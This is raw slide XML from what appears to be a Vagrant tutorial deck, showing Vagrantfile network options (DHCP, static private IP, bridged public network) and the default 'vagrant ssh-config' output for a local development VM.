                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ip-address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...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76546" y="3170532"/>
            <a:ext cx="97790" cy="1130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600" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>30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17" y="190436"/>
            <a:ext cx="17653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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-270" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr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89" y="699201"/>
            <a:ext cx="12623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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration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5605" y="1323501"/>
            <a:ext cx="144195" cy="1442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7786" y="1626269"/>
            <a:ext cx="144202" cy="1442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0494" y="1172151"/>
            <a:ext cx="1584960" cy="579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marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>”private_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>type: 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”dhcp”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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1</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565" marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>”private_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>ip: 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”192.168.50.4”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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2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53202" y="1323552"/>
            <a:ext cx="145649" cy="145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87929" y="1172151"/>
            <a:ext cx="15741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marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network 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”public_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  bridge: 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”en1: Wi-Fi (AirPort)”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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3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1304" y="2295668"/>
            <a:ext cx="190723" cy="1907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1072" y="2287026"/>
            <a:ext cx="13239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95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2 ... </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>up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10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>manually.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76546" y="3170532"/>
            <a:ext cx="97790" cy="1130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600" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>30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590" y="190436"/>
            <a:ext cx="1360170" cy="716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sz="1200" spc="-204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1200" spc="-170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BASICS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110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Terminology </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Workflow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3619" y="797596"/>
            <a:ext cx="3120555" cy="2274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17" y="190436"/>
            <a:ext cx="17653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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-270" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr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89" y="699201"/>
            <a:ext cx="12623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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration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5605" y="1323501"/>
            <a:ext cx="144195" cy="1442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7786" y="1626269"/>
            <a:ext cx="144202" cy="1442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0494" y="1172151"/>
            <a:ext cx="1584960" cy="579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marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>”private_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>type: 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”dhcp”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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1</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="75565" marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>”private_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>ip: 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”192.168.50.4”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>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2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53202" y="1323552"/>
            <a:ext cx="145649" cy="145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87929" y="1172151"/>
            <a:ext cx="15741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marR="5080" indent="-63500">
              <a:lnSpc>
                <a:spcPct val="137400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>conig.vm.network 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”public_network”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>,  bridge: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>”en1: Wi-Fi (AirPort)”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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>3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1324" y="2295051"/>
            <a:ext cx="191954" cy="1919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1707" y="2285884"/>
            <a:ext cx="16256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95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interface </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to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bridge.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76546" y="3170532"/>
            <a:ext cx="97790" cy="1130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600" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>30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17" y="190436"/>
            <a:ext cx="20148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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-195" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436773" y="1366288"/>
            <a:ext cx="171913" cy="1719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6929" y="1553349"/>
            <a:ext cx="322580" cy="353060"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="322074" y="83426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="315517" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="6555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="24434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="50952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155213" y="83426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161769" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179648" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206166" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238640" y="166852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="271116" y="160296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="297636" y="142417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315517" y="115899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322074" y="83426"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="322580" h="353060">
                <a:moveTo>
                  <a:pt x="168423" y="268846"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161805" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="184632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="191250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="209299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="236067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="268846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24663" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51431" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84212" y="353060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116991" y="346441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143758" y="328393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161805" y="301625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168423" y="268846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="40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04701" y="2290706"/>
            <a:ext cx="172700" cy="1727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8589" y="699201"/>
            <a:ext cx="3484879" cy="2030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90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration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12700" marR="2447925">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="25" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>ssh-conig  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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default</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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HostName 127.0.0.1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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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1</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="2440305">
              <a:lnSpc>
                <a:spcPct val="134300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant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# 2  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Port 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2222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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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3</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="1788795">
              <a:lnSpc>
                <a:spcPct val="101400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>UserKnownHostsFile</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75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/dev/null  StrictHostKeyChecking no  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>PasswordAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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no</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="5080">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentityFile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>”/home/user/.vagrant.d/insecure_private_key”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# 4  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>IdentitiesOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>LogLevel </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>FATAL</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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6546" y="3170661"/>
            <a:ext cx="97790" cy="1130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600" spc="-55" dirty="0"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17" y="190436"/>
            <a:ext cx="20148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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INTERNALS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-195" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436773" y="1366288"/>
            <a:ext cx="171913" cy="1719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6929" y="1553349"/>
